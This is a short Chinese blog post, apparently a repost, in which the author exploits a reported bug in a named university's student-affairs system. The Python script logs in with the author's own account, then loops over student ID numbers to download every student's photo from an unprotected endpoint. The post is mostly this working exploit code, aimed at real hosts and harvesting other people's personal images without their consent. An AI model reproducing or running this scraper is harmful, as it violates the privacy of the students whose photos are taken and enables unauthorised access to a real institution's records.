最近听同学说学工系统里面有个 bug, 试了一下还真有这么回事, 就利用这个漏洞爬一下头像咯
- import requests
- from urllib import request
- from lxml import etree
- url = "http://ca.lsu.edu.cn/zfca/login"
- headers = {
- "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ApplewebKit/537.36 (Khtml, like Gecko) Chrome/73.0.3683.103 Safari/537.36"}
- # 尝试先模拟发一次 get 请求 获取 cookie 获取 token
- session = requests.session()
- page_html = session.get(url=url, headers=headers).text
- # print(page_html)
- page_html = etree.HTML(page_html)
- code = page_html.xpath("//*[@id=\"thetable\"]/div[7]/span[1]/input[1]/@value")[0]
- print(code)
- # 通过抓包获取到 post 登录请求时携带的参数
- # 下面填上自己的用户名和密码即可
- data = {
- "useValidateCode": "0",
- "isremenberme": "0",
- "ip": "",
- "username": "",
- "password": "",
- "losetime": "240",
- "lt": code,
- "_eventId": "submit",
- "submit1": ""
- }
- # 模拟登录一下 获取 cookie 再跳转页面
- session.post(headers=headers, url=url, data=data)
- url = "http://xggl.lsu.edu.cn/xgxt/stuPage.jsp?jsName=student&caUserName="+data['username']
- reponse = session.get(url=url, headers=headers).text
- for i in range(start, end):
- url = "http://xggl.lsu.edu.cn/xgxt/xsxx_xsgl.do?method=showPhoto&xh=%s" % str(i)
- detail_page = session.get(url=url, headers=headers).content
- with open("./image/%s.jpeg" % i, "wb") as file:
- file.write(detail_page)
来源: http://www.bubuko.com/infodetail-3065481.html